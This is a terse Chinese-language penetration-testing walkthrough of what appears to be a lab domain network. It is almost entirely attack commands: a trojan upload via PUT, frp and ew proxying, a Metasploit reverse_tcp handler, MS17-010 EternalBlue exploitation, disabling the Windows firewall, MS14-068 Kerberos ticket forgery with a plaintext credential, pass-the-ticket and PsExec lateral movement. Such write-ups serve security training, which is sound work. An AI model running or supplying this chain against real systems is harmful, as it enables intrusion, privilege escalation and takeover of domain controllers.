信息收集
2001端口
2002端口
抓包修改为PUT请求,上传木马,前面加/
python -c 'import pty; pty.spawn("/bin/bash")'
添加代理
个人原因 重置
kali IP地址改为 192.168.1.128
centos IP地址为192.168.1.130
修改客户端
服务端
./frpc -c./frpc.ini
./frps-c./frps.ini
或者ew代理
chmod 777 ew_for_linux64
./ew_for_linux64 -s ssocksd -l 1080
proxychains代理
vi /etc/proxychains.conf
proxychains msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 192.168.1.128
set lport 4440
run
route add 192.168.183.0 255.255.255.0 2
route print
主机探测
use auxiliary/scanner/smb/smb_version
set rhosts 192.168.183.1/24
set threads 10
run
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 192.168.183.128-132
rhosts => 192.168.183.128-132
msf5 auxiliary(scanner/smb/smb_ms17_010) > run
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_eternalblue
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set lport 4440
msf5 exploit(windows/smb/ms17_010_eternalblue) > set rhost 192.168.183.129
msf5 exploit(windows/smb/ms17_010_eternalblue) >set lhost 192.168.1.128
msf5 exploit(windows/smb/ms17_010_eternalblue) > run
set payload windows/x64/shell/bind_tcp
只得到了shell
65001 UTF-8代码页 解决乱码
chcp 65001
netsh firewall set opmode disable 关闭防火墙
ipconfig
查看域内机器
net view /domain.demo
查看桌面
ms14-068.exe -u douser@demo.com -p Dotest123 -s S-1-5-21-979886063-1111900045-1414766810-1107 -d 192.168.183.130
kerberos::purge
kerberos::list
kerberos::ptc TGT_douser@demo.com.ccache
获取域控文件
dir \WIN-ENS2VR5TR3Nc$
使用PSTools目录下的PsExec.exe获取shell 失败
PsExec64.exe \WIN-ENS2VR5TR3N cmd.exe
参考文章
https://www.cnblogs.com/yuzly/p/10859520.html
https://blog.51cto.com/loveemily/2163147
https://blog.csdn.net/deng_xj/article/details/88952420
https://www.cnblogs.com/PANDA-Mosen/p/13118210.html